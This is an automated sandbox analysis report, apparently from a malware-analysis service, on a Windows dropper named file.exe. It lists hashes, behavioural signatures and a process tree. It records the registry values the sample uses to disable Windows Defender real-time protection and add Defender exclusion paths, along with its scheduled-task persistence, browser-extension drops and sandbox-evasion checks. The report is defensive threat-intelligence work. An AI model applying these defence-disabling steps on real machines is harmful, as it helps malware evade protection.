Analysis
-
max time kernel
136s -
max time network
139s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
06-02-2023 22:14
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220812-en
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
b5ceeee8096c730a9156dc752ad384b4
-
SHA1
4f4318e822b870e78980f71dcaa70d21f22e3135
-
SHA256
b0b4acd86937db49d7e4db0c3791442a85747cd677cd84cb78d41391c15ec495
-
SHA512
1b79d14a818c574f8f81b290856c476d35ed9afe1ae174fbc67155572a2b1b33a078a82c1bfdeb454a29f75ce2a84986d596a79614c30551a6a56ffab9f21218
-
SSDEEP
98304:91Oueznz7VB2EP1Wb5QdvDdmSwbOQC2a6j/lP7DMXnn41Xy8PtNGeeq13VApXq3V:91OBVoSWWBqNvFRDAVMGefAXMra5E1WW
Malware Config
Signatures
-
Processes:
reg.exereg.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.execonhost.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.execonhost.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QqSrWmvdGtwU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\cfvymemHCAUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\jUlWXsHGbnJNPdLP = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\RIuAFuLLU = "0" conhost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\fGfduYyRRUhwWrnEYNR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\qOrnnoslxFEibVOnF = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\FpvksngNCKIjC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\fGfduYyRRUhwWrnEYNR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\BekoRFZthbLHeaVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\BekoRFZthbLHeaVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\jUlWXsHGbnJNPdLP = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\FpvksngNCKIjC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\qOrnnoslxFEibVOnF = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\jUlWXsHGbnJNPdLP = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QqSrWmvdGtwU2 = "0" Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\cfvymemHCAUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\RIuAFuLLU = "0" conhost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\jUlWXsHGbnJNPdLP = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Blocklisted process makes network request 1 IoCs
Processes:
rundll32.exeflow pid process 21 1664 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exerundll32.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
twWLSVy.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Control Panel\International\Geo\Nation twWLSVy.exe -
Executes dropped EXE 4 IoCs
Processes:
Install.exeInstall.exeTWjAkEt.exetwWLSVy.exepid process 896 Install.exe 940 Install.exe 304 TWjAkEt.exe 1104 twWLSVy.exe -
Loads dropped DLL 12 IoCs
Processes:
file.exeInstall.exeInstall.exerundll32.exepid process 752 file.exe 896 Install.exe 896 Install.exe 896 Install.exe 896 Install.exe 940 Install.exe 940 Install.exe 940 Install.exe 1664 rundll32.exe 1664 rundll32.exe 1664 rundll32.exe 1664 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
Processes:
twWLSVy.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json twWLSVy.exe -
Drops file in System32 directory 19 IoCs
Processes:
twWLSVy.exeInstall.exeTWjAkEt.exepowershell.EXEpowershell.EXErundll32.exepowershell.EXEpowershell.EXEdescription ioc process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_7638F332B8B62A320F9A599D313334B6 twWLSVy.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_7638F332B8B62A320F9A599D313334B6 twWLSVy.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol TWjAkEt.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA twWLSVy.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_450C63FC50977E21DE9DE54EB1509725 twWLSVy.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol twWLSVy.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini TWjAkEt.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA twWLSVy.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol TWjAkEt.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat twWLSVy.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA twWLSVy.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA twWLSVy.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_450C63FC50977E21DE9DE54EB1509725 twWLSVy.exe -
Drops file in Program Files directory 13 IoCs
Processes:
twWLSVy.exedescription ioc process File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi twWLSVy.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja twWLSVy.exe File created C:\Program Files (x86)\RIuAFuLLU\zvTOjjj.xml twWLSVy.exe File created C:\Program Files (x86)\QqSrWmvdGtwU2\XbpzIKwuxSjCf.dll twWLSVy.exe File created C:\Program Files (x86)\fGfduYyRRUhwWrnEYNR\LGLcFvs.dll twWLSVy.exe File created C:\Program Files (x86)\fGfduYyRRUhwWrnEYNR\mKvNqep.xml twWLSVy.exe File created C:\Program Files (x86)\FpvksngNCKIjC\ZWWHTxe.dll twWLSVy.exe File created C:\Program Files (x86)\RIuAFuLLU\bzKuSC.dll twWLSVy.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak twWLSVy.exe File created C:\Program Files (x86)\QqSrWmvdGtwU2\jjOOKBz.xml twWLSVy.exe File created C:\Program Files (x86)\FpvksngNCKIjC\uctwdBY.xml twWLSVy.exe File created C:\Program Files (x86)\cfvymemHCAUn\vtZONra.dll twWLSVy.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi twWLSVy.exe -
Drops file in Windows directory 4 IoCs
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exedescription ioc process File created C:\Windows\Tasks\bCfEGNwGDQwhWneLvC.job schtasks.exe File created C:\Windows\Tasks\cfFFKgQyvKFYWQGgS.job schtasks.exe File created C:\Windows\Tasks\qcUOvNLqmSmqpxF.job schtasks.exe File created C:\Windows\Tasks\vdoHbRZAyoFFuVbVu.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 1988 schtasks.exe 2036 schtasks.exe 1424 schtasks.exe 1068 schtasks.exe 1724 schtasks.exe 1988 schtasks.exe 1920 schtasks.exe 820 schtasks.exe 1944 schtasks.exe 1496 schtasks.exe 1112 schtasks.exe 1752 schtasks.exe 1948 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
rundll32.exeInstall.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
rundll32.exewscript.exetwWLSVy.exedescription ioc process Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\d6-dd-0f-5e-73-0c\WpadDecision = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates twWLSVy.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates twWLSVy.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\d6-dd-0f-5e-73-0c twWLSVy.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates twWLSVy.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs twWLSVy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA twWLSVy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust twWLSVy.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates twWLSVy.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs twWLSVy.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings twWLSVy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings twWLSVy.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs twWLSVy.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs twWLSVy.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{44705F7C-6AA8-4ED6-A2F5-774BD2740C95}\d6-dd-0f-5e-73-0c rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{44705F7C-6AA8-4ED6-A2F5-774BD2740C95}\WpadDecision = "0" twWLSVy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople twWLSVy.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates twWLSVy.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates twWLSVy.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs twWLSVy.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs twWLSVy.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs twWLSVy.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{44705F7C-6AA8-4ED6-A2F5-774BD2740C95} twWLSVy.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{44705F7C-6AA8-4ED6-A2F5-774BD2740C95}\WpadDecisionReason = "1" twWLSVy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My twWLSVy.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs twWLSVy.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs twWLSVy.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\d6-dd-0f-5e-73-0c\WpadDecisionTime = 80503702813ad901 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 twWLSVy.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 twWLSVy.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{44705F7C-6AA8-4ED6-A2F5-774BD2740C95}\d6-dd-0f-5e-73-0c twWLSVy.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\d6-dd-0f-5e-73-0c\WpadDecision = "0" twWLSVy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust twWLSVy.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\d6-dd-0f-5e-73-0c\WpadDetectedUrl rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates twWLSVy.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs twWLSVy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot twWLSVy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root twWLSVy.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs twWLSVy.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 twWLSVy.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix twWLSVy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad twWLSVy.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs twWLSVy.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs twWLSVy.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" twWLSVy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed twWLSVy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople twWLSVy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs twWLSVy.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates twWLSVy.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{44705F7C-6AA8-4ED6-A2F5-774BD2740C95}\WpadNetworkName = "Network 3" twWLSVy.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\d6-dd-0f-5e-73-0c\WpadDecisionReason = "1" twWLSVy.exe -
Suspicious behavior: EnumeratesProcesses 29 IoCs
Processes:
powershell.EXEpowershell.EXEpowershell.EXEpowershell.EXEtwWLSVy.exepid process 1244 powershell.EXE 1244 powershell.EXE 1244 powershell.EXE 280 powershell.EXE 280 powershell.EXE 280 powershell.EXE 2020 powershell.EXE 2020 powershell.EXE 2020 powershell.EXE 1220 powershell.EXE 1220 powershell.EXE 1220 powershell.EXE 1104 twWLSVy.exe 1104 twWLSVy.exe 1104 twWLSVy.exe 1104 twWLSVy.exe 1104 twWLSVy.exe 1104 twWLSVy.exe 1104 twWLSVy.exe 1104 twWLSVy.exe 1104 twWLSVy.exe 1104 twWLSVy.exe 1104 twWLSVy.exe 1104 twWLSVy.exe 1104 twWLSVy.exe 1104 twWLSVy.exe 1104 twWLSVy.exe 1104 twWLSVy.exe 1104 twWLSVy.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.EXEpowershell.EXEpowershell.EXEpowershell.EXEdescription pid process Token: SeDebugPrivilege 1244 powershell.EXE Token: SeDebugPrivilege 280 powershell.EXE Token: SeDebugPrivilege 2020 powershell.EXE Token: SeDebugPrivilege 1220 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
file.exeInstall.exeInstall.exeforfiles.exeforfiles.execmd.execmd.exedescription pid process target process PID 752 wrote to memory of 896 752 file.exe Install.exe PID 752 wrote to memory of 896 752 file.exe Install.exe PID 752 wrote to memory of 896 752 file.exe Install.exe PID 752 wrote to memory of 896 752 file.exe Install.exe PID 752 wrote to memory of 896 752 file.exe Install.exe PID 752 wrote to memory of 896 752 file.exe Install.exe PID 752 wrote to memory of 896 752 file.exe Install.exe PID 896 wrote to memory of 940 896 Install.exe Install.exe PID 896 wrote to memory of 940 896 Install.exe Install.exe PID 896 wrote to memory of 940 896 Install.exe Install.exe PID 896 wrote to memory of 940 896 Install.exe Install.exe PID 896 wrote to memory of 940 896 Install.exe Install.exe PID 896 wrote to memory of 940 896 Install.exe Install.exe PID 896 wrote to memory of 940 896 Install.exe Install.exe PID 940 wrote to memory of 472 940 Install.exe forfiles.exe PID 940 wrote to memory of 472 940 Install.exe forfiles.exe PID 940 wrote to memory of 472 940 Install.exe forfiles.exe PID 940 wrote to memory of 472 940 Install.exe forfiles.exe PID 940 wrote to memory of 472 940 Install.exe forfiles.exe PID 940 wrote to memory of 472 940 Install.exe forfiles.exe PID 940 wrote to memory of 472 940 Install.exe forfiles.exe PID 940 wrote to memory of 2004 940 Install.exe forfiles.exe PID 940 wrote to memory of 2004 940 Install.exe forfiles.exe PID 940 wrote to memory of 2004 940 Install.exe forfiles.exe PID 940 wrote to memory of 2004 940 Install.exe forfiles.exe PID 940 wrote to memory of 2004 940 Install.exe forfiles.exe PID 940 wrote to memory of 2004 940 Install.exe forfiles.exe PID 940 wrote to memory of 2004 940 Install.exe forfiles.exe PID 472 wrote to memory of 1148 472 forfiles.exe cmd.exe PID 472 wrote to memory of 1148 472 forfiles.exe cmd.exe PID 472 wrote to memory of 1148 472 forfiles.exe cmd.exe PID 472 wrote to memory of 1148 472 forfiles.exe cmd.exe PID 472 wrote to memory of 1148 472 forfiles.exe cmd.exe PID 472 wrote to memory of 1148 472 forfiles.exe cmd.exe PID 472 wrote to memory of 1148 472 forfiles.exe cmd.exe PID 2004 wrote to memory of 1516 2004 forfiles.exe cmd.exe PID 2004 wrote to memory of 1516 2004 forfiles.exe cmd.exe PID 2004 wrote to memory of 1516 2004 forfiles.exe cmd.exe PID 2004 wrote to memory of 1516 2004 forfiles.exe cmd.exe PID 2004 wrote to memory of 1516 2004 forfiles.exe cmd.exe PID 2004 wrote to memory of 1516 2004 forfiles.exe cmd.exe PID 2004 wrote to memory of 1516 2004 forfiles.exe cmd.exe PID 1516 wrote to memory of 2020 1516 cmd.exe reg.exe PID 1516 wrote to memory of 2020 1516 cmd.exe reg.exe PID 1516 wrote to memory of 2020 1516 cmd.exe reg.exe PID 1516 wrote to memory of 2020 1516 cmd.exe reg.exe PID 1516 wrote to memory of 2020 1516 cmd.exe reg.exe PID 1516 wrote to memory of 2020 1516 cmd.exe reg.exe PID 1516 wrote to memory of 2020 1516 cmd.exe reg.exe PID 1148 wrote to memory of 324 1148 cmd.exe reg.exe PID 1148 wrote to memory of 324 1148 cmd.exe reg.exe PID 1148 wrote to memory of 324 1148 cmd.exe reg.exe PID 1148 wrote to memory of 324 1148 cmd.exe reg.exe PID 1148 wrote to memory of 324 1148 cmd.exe reg.exe PID 1148 wrote to memory of 324 1148 cmd.exe reg.exe PID 1148 wrote to memory of 324 1148 cmd.exe reg.exe PID 1516 wrote to memory of 704 1516 cmd.exe reg.exe PID 1516 wrote to memory of 704 1516 cmd.exe reg.exe PID 1516 wrote to memory of 704 1516 cmd.exe reg.exe PID 1516 wrote to memory of 704 1516 cmd.exe reg.exe PID 1516 wrote to memory of 704 1516 cmd.exe reg.exe PID 1516 wrote to memory of 704 1516 cmd.exe reg.exe PID 1516 wrote to memory of 704 1516 cmd.exe reg.exe PID 1148 wrote to memory of 284 1148 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSFA86.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSFE8B.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
